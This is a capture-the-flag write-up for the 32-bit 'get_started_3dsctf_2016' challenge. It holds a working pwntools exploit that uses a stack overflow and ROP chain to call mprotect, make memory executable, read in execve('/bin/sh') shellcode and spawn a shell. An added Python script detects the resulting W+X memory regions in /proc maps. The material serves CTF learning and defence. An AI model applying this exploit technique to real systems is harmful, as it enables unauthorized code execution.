get_started_3dsctf_2016
- Key function: `mprotect(start address, length, protection flags)`
  It changes the read/write/execute permissions of a memory region.
```python
from pwn import *

context.os = 'linux'
context.arch = 'i386'

sh = process("./get_started_3dsctf_2016")
elf = ELF("./get_started_3dsctf_2016")
#sh = remote("node3.buuoj.cn", 27306)
#payload = b'a'*56 + p32(0x80489B8)

# mprotect() inside the statically linked binary, plus a pop;pop;pop;ret gadget
# that removes its three arguments from the stack afterwards
mprotect = 0x0806EC80
pop3 = 0x080509a5
#pop3 = 0x080a25b6

mem_addr = 0x80EB000   # page-aligned start of the region to make executable
mem_size = 0x2000      # length of that region
mem_proc = 0x7         # PROT_READ | PROT_WRITE | PROT_EXEC

# 56 bytes of padding fill the stack frame, then mprotect overwrites the saved
# return address; pop3 is mprotect's return address and cleans up its arguments
payload = b'a'*56 + p32(mprotect) + p32(pop3)
payload += p32(mem_addr) + p32(mem_size) + p32(mem_proc)

# read(0, mem_addr, 0x100) and then "return" into mem_addr, where the shellcode lands
read = elf.symbols['read']
payload += p32(read)
payload += p32(mem_addr)   # return address of read(): jump to the shellcode
payload += p32(0)          # fd = stdin
payload += p32(mem_addr)   # buf
payload += p32(0x100)      # count
payload += p32(mem_addr)   # extra dword after the arguments (not consumed)
sh.sendline(payload)

#payload_sh = asm(shellcraft.sh())
# execve("/bin/sh", NULL, NULL) shellcode
shellcode = asm('''
mov edx, 0              # envp = NULL
mov ecx, 0              # argv = NULL
push 0x68732f           # "/sh" followed by a NUL byte, little-endian
push 0x6e69622f         # "/bin", little-endian
mov ebx, esp            # ebx -> "/bin/sh"
mov eax, 0xb            # __NR_execve
int 0x80
''')
#payload_sh = asm(shellcraft.sh(), arch='i386', os='linux')  # no idea why, but this one does not work on this challenge
sh.sendline(shellcode)
sh.interactive()
```
| Stack layout (low address at the top) |
|---|
| ....... |
| ret (mprotect) |
| pop3 |
| mem_addr |
| mem_size |
| mem_proc (protection value) |
| read |
| addr (return address of read) |
| arg 1 ... |
| ..... |
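The chain above works because `mprotect(mem_addr, 0x2000, 7)` turns a page range into a region that is writable and executable at the same time, which is exactly the state NX is meant to rule out. As an added example, not part of the writeup, the following Python script does the defender-side check: it parses `/proc/<pid>/maps` text, flags every W+X mapping, decodes a protection value such as `0x7` into rwx notation, and checks the page alignment that `mprotect()` requires of its start address. The two maps listings are constructed samples (paths, inode numbers and the vdso/stack ranges are made up), not captured from the challenge binary.

```python
import re
from dataclasses import dataclass
from typing import List

PAGE_SIZE = 0x1000
PROT_READ, PROT_WRITE, PROT_EXEC = 0x1, 0x2, 0x4


@dataclass
class Mapping:
    start: int
    end: int
    perms: str  # e.g. "rwxp"
    path: str   # "" for anonymous mappings


# One /proc/<pid>/maps line: "start-end perms offset dev inode [path]"
MAPS_LINE = re.compile(
    r"^([0-9a-f]+)-([0-9a-f]+)\s+([rwxsp-]{4})\s+[0-9a-f]+\s+\S+\s+\d+\s*(.*)$"
)


def parse_maps(text: str) -> List[Mapping]:
    """Parse the contents of a /proc/<pid>/maps file."""
    mappings = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = MAPS_LINE.match(line)
        if m is None:
            raise ValueError(f"unparseable maps line: {line!r}")
        mappings.append(Mapping(int(m.group(1), 16), int(m.group(2), 16),
                                m.group(3), m.group(4).strip()))
    return mappings


def wx_regions(mappings: List[Mapping]) -> List[Mapping]:
    """Mappings that are writable and executable at once (W^X violations)."""
    return [m for m in mappings if "w" in m.perms and "x" in m.perms]


def prot_to_str(prot: int) -> str:
    """Decode an mprotect() protection value into rwx notation, e.g. 7 -> 'rwx'."""
    bits = (("r", PROT_READ), ("w", PROT_WRITE), ("x", PROT_EXEC))
    return "".join(ch if prot & bit else "-" for ch, bit in bits)


def is_page_aligned(addr: int) -> bool:
    """mprotect() fails with EINVAL unless the start address is page-aligned."""
    return addr % PAGE_SIZE == 0


# Constructed samples (not captured from a real process): a statically linked
# 32-bit program before and after mprotect(0x80EB000, 0x2000, 7).
MAPS_BEFORE = """\
08048000-080ea000 r-xp 00000000 08:01 123456 /tmp/get_started_3dsctf_2016
080ea000-080eb000 rw-p 000a1000 08:01 123456 /tmp/get_started_3dsctf_2016
080eb000-080ed000 rw-p 00000000 00:00 0
080ed000-0810f000 rw-p 00000000 00:00 0 [heap]
f7ffd000-f7ffe000 r-xp 00000000 00:00 0 [vdso]
fffdd000-ffffe000 rw-p 00000000 00:00 0 [stack]
"""
MAPS_AFTER = MAPS_BEFORE.replace(
    "080eb000-080ed000 rw-p", "080eb000-080ed000 rwxp")


def audit(text: str) -> List[str]:
    """Return one report line per W+X mapping found in a maps listing."""
    return [f"W+X region {m.start:#010x}-{m.end:#010x} ({m.end - m.start:#x} bytes) "
            f"{m.path or '[anonymous]'}" for m in wx_regions(parse_maps(text))]


if __name__ == "__main__":
    print("before:", audit(MAPS_BEFORE) or "clean")
    print("after: ", audit(MAPS_AFTER) or "clean")
    print("prot 0x7 =", prot_to_str(7),
          "| 0x80EB000 page-aligned:", is_page_aligned(0x80EB000))
```

Against a live process the same check is `audit(open(f"/proc/{pid}/maps").read())`. A W+X hit in a program that was built with NX is the footprint this kind of chain leaves behind; an auditd or seccomp rule that logs `mprotect` calls carrying `PROT_EXEC` catches the transition itself rather than its result.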